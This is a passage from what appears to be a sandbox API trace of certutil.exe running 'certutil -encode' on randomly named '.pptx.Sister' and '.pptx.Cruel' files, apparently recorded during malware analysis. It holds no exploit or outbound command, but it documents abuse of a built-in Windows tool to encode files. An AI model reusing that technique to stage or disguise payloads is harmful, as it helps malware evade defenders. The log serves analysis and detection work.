(lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0287.226] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0287.226] WerSetFlags () returned 0x0 [0287.227] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0287.227] __iob_func () returned 0x7ffcea2dea00 [0287.227] _fileno (_File=0x7ffcea2dea30) returned 1 [0287.227] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0287.227] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0287.228] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0287.228] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0287.228] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0287.228] GetConsoleOutputCP () returned 0x1b5 [0287.300] _vsnwprintf (in: _Buffer=0xaa8db9f880, _BufferCount=0xb, _Format=".%d", _ArgList=0xaa8db9f7a8 | out: _Buffer=".437") returned 4 [0287.300] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0287.300] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0287.300] GetFileType (hFile=0x50) returned 0x2 [0287.300] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0287.300] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0287.300] SetThreadUILanguage (LangId=0x0) returned 0x409 [0287.413] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0287.413] GetCommandLineW () returned="certutil -encode \"_zyi016uyI EccZobgM.pptx.Sister\" \"_zyi016uyI EccZobgM.pptx.Cruel\"" [0287.413] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1c0ed1eb740 [0287.413] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c0ed1dcc60 [0287.413] LocalFree (hMem=0x1c0ed1eb740) returned 0x0 [0287.413] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c0ed1e2280 [0287.413] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1c0ed1e1e60 [0287.413] LocalFree (hMem=0x1c0ed1e2280) returned 0x0 [0287.413] LocalFree (hMem=0x1c0ed1dcc60) returned 0x0 [0287.413] LocalFree (hMem=0x0) returned 0x0 [0287.414] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0287.415] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0287.415] GetCommandLineW () returned="certutil -encode \"_zyi016uyI EccZobgM.pptx.Sister\" \"_zyi016uyI EccZobgM.pptx.Cruel\"" [0287.415] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1c0ed1eb900 [0287.416] GetSystemTime (in: lpSystemTime=0xaa8db9f570 | out: lpSystemTime=0xaa8db9f570*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0x1, wMilliseconds=0x3bc)) [0287.416] SystemTimeToFileTime (in: lpSystemTime=0xaa8db9f570, lpFileTime=0xaa8db9f568 | out: lpFileTime=0xaa8db9f568) returned 1 [0287.416] FileTimeToLocalFileTime (in: lpFileTime=0xaa8db9f568, lpLocalFileTime=0xaa8db9f530 | out: lpLocalFileTime=0xaa8db9f530) returned 1 [0287.416] FileTimeToSystemTime (in: lpFileTime=0xaa8db9f530, lpSystemTime=0xaa8db9f2a0 | out: lpSystemTime=0xaa8db9f2a0) returned 1 [0287.416] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xaa8db9f2a0, lpFormat=0x0, lpDateStr=0xaa8db9f3b0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0287.416] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xaa8db9f2a0, lpFormat=0x0, lpTimeStr=0xaa8db9f2b0, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0287.416] _vsnwprintf (in: _Buffer=0xaa8db9f2be, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xaa8db9f288 | out: _Buffer=" 01.956s") returned 8 [0287.416] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1c0ed1ee410 [0287.416] SetLastError (dwErrCode=0x80070716) [0287.416] _vsnwprintf (in: _Buffer=0xaa8db9f338, _BufferCount=0xb, _Format="%d", _ArgList=0xaa8db9f328 | out: _Buffer="948") returned 3 [0287.416] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xaa8db9f0f0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0287.417] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1c0ed1eba60 [0287.417] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1c0ed1e4090 [0287.417] LocalFree (hMem=0x1c0ed1ee410) returned 0x0 [0287.417] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xaa8db9f5e0 | out: lpSystemTimeAsFileTime=0xaa8db9f5e0*(dwLowDateTime=0xd5ec2d4a, dwHighDateTime=0x1d6141f)) [0287.417] GetLocalTime (in: lpSystemTime=0xaa8db9f618 | out: lpSystemTime=0xaa8db9f618*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0x1, wMilliseconds=0x3bd)) [0287.417] SystemTimeToFileTime (in: lpSystemTime=0xaa8db9f618, lpFileTime=0xaa8db9f5f0 | out: lpFileTime=0xaa8db9f5f0) returned 1 [0287.417] CompareFileTime (lpFileTime1=0xaa8db9f5f0, lpFileTime2=0xaa8db9f5e0) returned 1 [0287.417] _vsnwprintf (in: _Buffer=0xaa8db9f628, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xaa8db9f5b8 | out: _Buffer="GMT + 2.00") returned 10 [0287.417] LocalFree (hMem=0x1c0ed1eb900) returned 0x0 [0287.418] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0287.418] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0287.418] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0287.418] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0287.418] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0287.418] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xaa8db9f658 | out: _Buffer="10.0.15063.447") returned 14 [0287.418] GetACP () returned 0x4e4 [0287.418] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0287.418] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c0ed1eb6e0 [0287.418] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c0ed1eb6e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0287.418] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c0ed1eea10 [0287.418] _vsnwprintf (in: _Buffer=0x1c0ed1eea10, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xaa8db9f6a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0287.418] LocalFree (hMem=0x1c0ed1eb6e0) returned 0x0 [0287.418] LocalFree (hMem=0x0) returned 0x0 [0287.419] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0287.419] GetACP () returned 0x4e4 [0287.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0287.419] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c0ed1eba20 [0287.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c0ed1eba20, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0287.419] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c0ed1ee790 [0287.419] _vsnwprintf (in: _Buffer=0x1c0ed1ee790, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xaa8db9f6a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0287.419] LocalFree (hMem=0x1c0ed1eba20) returned 0x0 [0287.419] LocalFree (hMem=0x0) returned 0x0 [0287.419] GetACP () returned 0x4e4 [0287.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0287.419] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c0ed1eb500 [0287.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c0ed1eb500, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0287.419] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c0ed1ee710 [0287.419] _vsnwprintf (in: _Buffer=0x1c0ed1ee710, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xaa8db9f6d8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0287.419] LocalFree (hMem=0x1c0ed1eb500) returned 0x0 [0287.419] LocalFree (hMem=0x1c0ed1eea10) returned 0x0 [0287.419] LocalFree (hMem=0x1c0ed1ee790) returned 0x0 [0287.419] LocalFree (hMem=0x1c0ed1ee710) returned 0x0 [0287.419] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0287.420] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0287.420] GetStockObject (i=0) returned 0x900010 [0287.420] RegisterClassW (lpWndClass=0xaa8db9f800) returned 0xc1a2 [0287.422] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1302c6 [0287.508] NtdllDefWindowProc_W () returned 0x0 [0287.508] NtdllDefWindowProc_W () returned 0x1 [0287.515] NtdllDefWindowProc_W () returned 0x0 [0287.525] UpdateWindow (hWnd=0x1302c6) returned 1 [0287.526] PostMessageW (hWnd=0x1302c6, Msg=0x400, wParam=0x0, lParam=0x1c0ed1d217e) returned 1 [0287.526] GetMessageW (in: lpMsg=0xaa8db9f850, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xaa8db9f850) returned 1 [0287.526] TranslateMessage (lpMsg=0xaa8db9f850) returned 0 [0287.526] DispatchMessageW (lpMsg=0xaa8db9f850) returned 0x0 [0287.526] NtdllDefWindowProc_W () returned 0x0 [0287.526] GetMessageW (in: lpMsg=0xaa8db9f850, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xaa8db9f850) returned 1 [0287.526] TranslateMessage (lpMsg=0xaa8db9f850) returned 0 [0287.526] DispatchMessageW (lpMsg=0xaa8db9f850) returned 0x0 [0287.526] LocalAlloc (uFlags=0x0, uBytes=0x96) returned 0x1c0ed1d4450 [0287.526] LocalAlloc (uFlags=0x0, uBytes=0xaa) returned 0x1c0ed1dde00 [0287.527] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0287.527] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0287.527] SetLastError (dwErrCode=0x80070716) [0287.527] _vsnwprintf (in: _Buffer=0xaa8db9f258, _BufferCount=0xb, _Format="%d", _ArgList=0xaa8db9f248 | out: _Buffer="465") returned 3 [0287.527] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xaa8db9f010, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0287.527] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c0ed1e2100 [0287.527] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0287.527] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0287.527] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xaa8db9eff0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0287.527] GetLastError () returned 0xcb [0287.528] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0287.528] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0287.528] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0287.528] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0287.528] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0287.528] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0287.528] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0287.528] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0287.528] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0287.528] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0287.528] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0287.528] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0287.528] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0287.528] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0287.528] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0287.528] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0287.528] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0287.528] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0287.528] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0287.528] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0287.528] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0287.528] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xaa8db9ecb8 | out: phkResult=0xaa8db9ecb8*=0x23c) returned 0x0 [0287.529] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1c0ed1d91a0 [0287.529] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xaa8db9f228, lpData=0xaa8db9f258, lpcbData=0xaa8db9f220*=0x4 | out: lpType=0xaa8db9f228*=0x0, lpData=0xaa8db9f258*=0x0, lpcbData=0xaa8db9f220*=0x4) returned 0x2 [0287.529] LocalFree (hMem=0x1c0ed1d91a0) returned 0x0 [0287.529] RegCloseKey (hKey=0x23c) returned 0x0 [0287.529] LocalFree (hMem=0x0) returned 0x0 [0287.529] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1c0ed1fc700 [0287.542] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0287.542] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0287.542] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0287.598] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0287.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0287.599] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1c0ed201230 [0287.599] GetComputerNameW (in: lpBuffer=0x1c0ed201230, nSize=0xaa8db9f220 | out: lpBuffer="NQDPDE", nSize=0xaa8db9f220) returned 1 [0287.600] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xaa8db9f1f0 | out: lpBuffer=0x0, nSize=0xaa8db9f1f0) returned 0 [0287.600] GetLastError () returned 0xea [0287.600] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c0ed1eb960 [0287.600] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1c0ed1eb960, nSize=0xaa8db9f1f0 | out: lpBuffer="NQdPdE", nSize=0xaa8db9f1f0) returned 1 [0287.601] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0287.605] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1c0ed201840, cbCertEncoded=0x12338) returned 0x0 [0287.610] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1c0ed201840, cbCrlEncoded=0x12338) returned 0x0 [0287.612] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1c0ed201840, cbEncoded=0x12338, dwFlags=0x8000, pDecodePara=0xaa8db9f0d0, pvStructInfo=0xaa8db9f160, pcbStructInfo=0xaa8db9f154 | out: pvStructInfo=0xaa8db9f160, pcbStructInfo=0xaa8db9f154) returned 0 [0287.613] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1c0ed201840, cbEncoded=0x12338, dwFlags=0x8000, pDecodePara=0xaa8db9f0d0, pvStructInfo=0xaa8db9f160, pcbStructInfo=0xaa8db9f154 | out: pvStructInfo=0xaa8db9f160, pcbStructInfo=0xaa8db9f154) returned 0 [0287.613] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1c0ed201840, cbEncoded=0x12338, dwFlags=0x8000, pDecodePara=0xaa8db9f0d0, pvStructInfo=0xaa8db9f160, pcbStructInfo=0xaa8db9f154 | out: pvStructInfo=0xaa8db9f160, pcbStructInfo=0xaa8db9f154) returned 0 [0287.613] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1c0ed1e2c70 [0287.623] CryptMsgUpdate (hCryptMsg=0x1c0ed1e2c70, pbData=0x1c0ed201840, cbData=0x12338, fFinal=1) returned 0 [0287.623] GetLastError () returned 0x8009310b [0287.624] CryptMsgClose (hCryptMsg=0x1c0ed1e2c70) returned 1 [0287.624] GetFileAttributesExW (in: lpFileName="_zyi016uyI EccZobgM.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\_zyi016uyi ecczobgm.pptx.sister"), fInfoLevelId=0x0, lpFileInformation=0xaa8db9f180 | out: lpFileInformation=0xaa8db9f180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c02c00, ftCreationTime.dwHighDateTime=0x1d5e98a, ftLastAccessTime.dwLowDateTime=0xea1a3650, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xea1a3650, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x12338)) returned 1 [0287.624] _vsnwprintf (in: _Buffer=0xaa8db9f188, _BufferCount=0xb, _Format="%d", _ArgList=0xaa8db9f178 | out: _Buffer="359") returned 3 [0287.624] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xaa8db9ef40, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0287.624] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1c0ed201170 [0287.624] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0287.624] _vsnwprintf (in: _Buffer=0xaa8db9e170, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xaa8db9f1c8 | out: _Buffer="Input Length = 74552") returned 20 [0287.624] GetFileType (hFile=0x50) returned 0x2 [0287.624] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xaa8db9e170*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xaa8db9e124, lpReserved=0x0 | out: lpBuffer=0xaa8db9e170*, lpNumberOfCharsWritten=0xaa8db9e124*=0x14) returned 1 [0287.699] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0287.699] _vsnwprintf (in: _Buffer=0xaa8db9e170, _BufferCount=0x1ff, _Format="\n", _ArgList=0xaa8db9f1c8 | out: _Buffer="\n") returned 1 [0287.699] GetFileType (hFile=0x50) returned 0x2 [0287.699] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xaa8db9e170*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xaa8db9e124, lpReserved=0x0 | out: lpBuffer=0xaa8db9e170*, lpNumberOfCharsWritten=0xaa8db9e124*=0x1) returned 1 [0287.862] GetFileAttributesExW (in: lpFileName="_zyi016uyI EccZobgM.pptx.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\_zyi016uyi ecczobgm.pptx.cruel"), fInfoLevelId=0x0, lpFileInformation=0xaa8db9f180 | out: lpFileInformation=0xaa8db9f180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd623d33f, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd62b0c01, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x190a8)) returned 1 [0287.862] _vsnwprintf (in: _Buffer=0xaa8db9f188, _BufferCount=0xb, _Format="%d", _ArgList=0xaa8db9f178 | out: _Buffer="361") returned 3 [0287.862] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xaa8db9ef40, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0287.863] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1c0ed201650 [0287.863] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0287.863] _vsnwprintf (in: _Buffer=0xaa8db9e170, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xaa8db9f1c8 | out: _Buffer="Output Length = 102568") returned 22 [0287.863] GetFileType (hFile=0x50) returned 0x2 [0287.863] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xaa8db9e170*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xaa8db9e124, lpReserved=0x0 | out: lpBuffer=0xaa8db9e170*, lpNumberOfCharsWritten=0xaa8db9e124*=0x16) returned 1 [0287.986] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0287.986] _vsnwprintf (in: _Buffer=0xaa8db9e170, _BufferCount=0x1ff, _Format="\n", _ArgList=0xaa8db9f1c8 | out: _Buffer="\n") returned 1 [0287.986] GetFileType (hFile=0x50) returned 0x2 [0287.986] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xaa8db9e170*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xaa8db9e124, lpReserved=0x0 | out: lpBuffer=0xaa8db9e170*, lpNumberOfCharsWritten=0xaa8db9e124*=0x1) returned 1 [0288.064] LocalFree (hMem=0x1c0ed201840) returned 0x0 [0288.064] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0288.064] _vsnwprintf (in: _Buffer=0xaa8db9f1e8, _BufferCount=0xb, _Format="%d", _ArgList=0xaa8db9f1d8 | out: _Buffer="2022") returned 4 [0288.064] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xaa8db9efa0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0288.064] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1c0ed1d8b80 [0288.064] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0288.065] _vsnwprintf (in: _Buffer=0xaa8db9e1d0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xaa8db9f228 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0288.065] GetFileType (hFile=0x50) returned 0x2 [0288.065] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xaa8db9e1d0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xaa8db9e184, lpReserved=0x0 | out: lpBuffer=0xaa8db9e1d0*, lpNumberOfCharsWritten=0xaa8db9e184*=0x31) returned 1 [0288.189] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0288.190] _vsnwprintf (in: _Buffer=0xaa8db9e1d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xaa8db9f228 | out: _Buffer="\n") returned 1 [0288.190] GetFileType (hFile=0x50) returned 0x2 [0288.190] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xaa8db9e1d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xaa8db9e184, lpReserved=0x0 | out: lpBuffer=0xaa8db9e1d0*, lpNumberOfCharsWritten=0xaa8db9e184*=0x1) returned 1 [0288.268] LocalFree (hMem=0x0) returned 0x0 [0288.269] LocalFree (hMem=0x1c0ed1dde00) returned 0x0 [0288.269] LocalFree (hMem=0x1c0ed1d4450) returned 0x0 [0288.269] SetLastError (dwErrCode=0x80070716) [0288.269] _vsnwprintf (in: _Buffer=0xaa8db9f258, _BufferCount=0xb, _Format="%d", _ArgList=0xaa8db9f248 | out: _Buffer="511") returned 3 [0288.269] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xaa8db9f010, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0288.269] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1c0ed201740 [0288.269] PostQuitMessage (nExitCode=0) [0288.270] GetMessageW (in: lpMsg=0xaa8db9f850, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xaa8db9f850) returned 0 [0288.270] LocalFree (hMem=0x1c0ed1eb960) returned 0x0 [0288.270] LocalFree (hMem=0x1c0ed201230) returned 0x0 [0288.270] LocalFree (hMem=0x0) returned 0x0 [0288.270] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0288.272] GetLastError () returned 0x7e [0288.273] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0288.273] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0288.273] DllMain () returned 